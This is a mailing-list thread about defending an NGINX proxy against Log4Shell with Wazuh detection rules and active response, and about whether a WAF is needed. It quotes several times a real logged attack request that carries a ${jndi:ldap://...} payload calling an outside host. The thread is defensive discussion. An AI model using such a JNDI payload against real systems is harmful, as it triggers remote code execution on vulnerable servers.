how to protect NGINX-based proxy from Log4j attacks: Wazuh or WAF?
379 views
Skip to first unread message
mauro....@cmcc.it
Dec 27, 2021, 6:01:31 PM12/27/21
to Wazuh mailing list
Dear Users,
I'm trying to protect our NGINX-based proxy from Log4j attacks.
Log4j package is not installed on the proxy server and all the services behind the proxy have the updated version of Log4j.
Unfortunately, after applying the solution provided here https://wazuh.com/blog/detecting-log4shell-with-wazuh/, Wazuh started detecting a lot of Log4j attacks and it stopped them with active-responses.
Now my questions are:
1) do I need to do something else to make the proxy safe? is Wazuh enough to be sure or I should add a WAF?
2) I noticed that, sometimes, NGINX server response is "HTTP/1.1 200".
2) I noticed that, sometimes, NGINX server response is "HTTP/1.1 200".
What does it mean? Why it happens? Proxy doesn't have Log4j...
Received From: "proxy Ip"->/var/log/nginx/access.log
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 107.77.106.62
Portion of the log(s):
107.77.106.62 - - [27/Dec/2021:23:31:53 +0100] "GET /?uoasq=${jndi:ldap://proxy_ipc753v6c2vtc0000ew2vggd1t7uryyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
Could you please help me to understand how I should proceed?
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 107.77.106.62
Portion of the log(s):
107.77.106.62 - - [27/Dec/2021:23:31:53 +0100] "GET /?uoasq=${jndi:ldap://proxy_ipc753v6c2vtc0000ew2vggd1t7uryyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
Could you please help me to understand how I should proceed?
Thank you in advance,
Mauro
Juan Pablo Cordone Rosello
Jan 17, 2022, 3:37:46 PM1/17/22
to Wazuh mailing list
Hi Mauro,
Sorry for the belated response. The blog post you followed has two separate sections:
Please let us know whether this answers your questions or you need any further clarification.
Regards,
JP.-
Sorry for the belated response. The blog post you followed has two separate sections:
- Detecting whether your environment has any endpoint with a vulnerable Log4J library: This helps you configure the security configuration assessment (SCA) capability to find out whether your environment is vulnerable or not. It does not do any remediation, but if you check the SCA policy, it does provide a hint towards what the remediation is:
You can find more information on this capability here. You could also use this same alert to trigger an active response, which will in turn perform an action on your endpoint to remediate it. You will find more information on how our active response works here. - Detecting exploit attempts: this rules are just to detect if there were any exploit attempts, regardless of whether they were successful or not. There is no active response configured on the post.
Please let us know whether this answers your questions or you need any further clarification.
Regards,
JP.-
Mauro Tridici
Jan 18, 2022, 3:01:47 AM1/18/22
to Juan Pablo Cordone Rosello, Wazuh mailing list
Hello Juan Pablo,
thank you very much for your reply. I really appreciated it.
Your explanation is very useful, for sure.
Anyway, I still have a last question to do:
I just activated an active response to block Log4j attacks using Wazuh and it works as expected.
I would like to know if it is enough to fight against Log4j attacks or I also need to activate some WAF module additionally.
This is my last question :)
Many thanks in advance,
Mauro
On 17 Jan 2022, at 21:37, Juan Pablo Cordone Rosello <juan.c...@wazuh.com> wrote:
Hi Mauro,
Sorry for the belated response. The blog post you followed has two separate sections:
- Detecting whether your environment has any endpoint with a vulnerable Log4J library: This helps you configure the security configuration assessment (SCA) capability to find out whether your environment is vulnerable or not. It does not do any remediation, but if you check the SCA policy, it does provide a hint towards what the remediation is:
- Detecting exploit attempts: this rules are just to detect if there were any exploit attempts, regardless of whether they were successful or not. There is no active response configured on the post.
Please let us know whether this answers your questions or you need any further clarification.
Regards,
JP.-On Monday, December 27, 2021 at 8:01:31 PM UTC-3 mauro....@cmcc.it wrote:Dear Users,I'm trying to protect our NGINX-based proxy from Log4j attacks.Log4j package is not installed on the proxy server and all the services behind the proxy have the updated version of Log4j.Unfortunately, after applying the solution provided here https://wazuh.com/blog/detecting-log4shell-with-wazuh/, Wazuh started detecting a lot of Log4j attacks and it stopped them with active-responses.Now my questions are:1) do I need to do something else to make the proxy safe? is Wazuh enough to be sure or I should add a WAF?
2) I noticed that, sometimes, NGINX server response is "HTTP/1.1 200".What does it mean? Why it happens? Proxy doesn't have Log4j...Received From: "proxy Ip"->/var/log/nginx/access.log
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 107.77.106.62
Portion of the log(s):
107.77.106.62 - - [27/Dec/2021:23:31:53 +0100] "GET /?uoasq=${jndi:ldap://proxy_ipc753v6c2vtc0000ew2vggd1t7uryyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
Could you please help me to understand how I should proceed?Thank you in advance,Mauro
--
You received this message because you are subscribed to a topic in the Google Groups "Wazuh mailing list" group.
To unsubscribe from this topic, visit https://groups.google.com/d/topic/wazuh/k7fkLjIMNwc/unsubscribe.
To unsubscribe from this group and all its topics, send an email to wazuh+un...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/wazuh/1fdf21c0-bccf-411e-912c-2cbbac82a011n%40googlegroups.com.
<Wazuh - Log4J.png>
-------------------------
Mauro Tridici
Fondazione CMCC
CMCC Supercomputing Center
presso Complesso Ecotekne - Università del Salento -
Strada Prov.le Lecce - Monteroni sn
73100 Lecce IT
http://www.cmcc.it
mobile: (+39) 327 5630841
email: mauro....@cmcc.it
https://it.linkedin.com/in/mauro-tridici-5977238b
Mauro Tridici
Fondazione CMCC
CMCC Supercomputing Center
presso Complesso Ecotekne - Università del Salento -
Strada Prov.le Lecce - Monteroni sn
73100 Lecce IT
http://www.cmcc.it
mobile: (+39) 327 5630841
email: mauro....@cmcc.it
https://it.linkedin.com/in/mauro-tridici-5977238b
-------------------------
Le informazioni contenute in questo messaggio di posta elettronica e negli allegati se presenti sono riservate e confidenziali: ne è vietata la diffusione in qualsiasi modo o forma (GDPR 2016/679).
Qualora lei non fosse il destinatario del messaggio, la invito a non diffonderlo e ad eliminarlo dandone gentilmente comunicazione al mittente.
The information included in this e-mail and any attachments are confidential and may also be privileged (GDPR 2016/679).
If you are not the correct recipient, you are kindly requested to notify the sender immediately, to cancel it and not disclose the contents to any other person.
Qualora lei non fosse il destinatario del messaggio, la invito a non diffonderlo e ad eliminarlo dandone gentilmente comunicazione al mittente.
The information included in this e-mail and any attachments are confidential and may also be privileged (GDPR 2016/679).
If you are not the correct recipient, you are kindly requested to notify the sender immediately, to cancel it and not disclose the contents to any other person.
Juan Pablo Cordone Rosello
Jan 31, 2022, 6:41:26 PM1/31/22
to Wazuh mailing list
Mauro, sorry for the late response!
Even though you're using Wazuh's active response capabilities to block IP addresses from incoming Log4Shell vulnerability exploits, Wazuh does not work as a network IPS, but rather as an IDS and then acts upon the detected event rather than preventing it from happening.
A WAF, on the other hand, can prevent the attacks by blocking the incoming traffic after inspecting it. A well configured WAF can restrict access to the applications only by restricting the access by a set of parameters you configure.
Both serve different purposes. Wazuh can even ingest the logs from the WAF to get further information about the activity.
Please let me know if this answers your questions. Regards,
JP.-
A WAF, on the other hand, can prevent the attacks by blocking the incoming traffic after inspecting it. A well configured WAF can restrict access to the applications only by restricting the access by a set of parameters you configure.
Both serve different purposes. Wazuh can even ingest the logs from the WAF to get further information about the activity.
Please let me know if this answers your questions. Regards,
JP.-
Mauro Tridici
Feb 2, 2022, 5:46:53 AM2/2/22
to Juan Pablo Cordone Rosello, Wazuh mailing list
Hello Juan Pablo,
thank you very much for the explanation.
Now, everything is more clear to me.
Hvae a great day.
Kind Regards,
Mauro
Reply all
Reply to author
Forward
0 new messages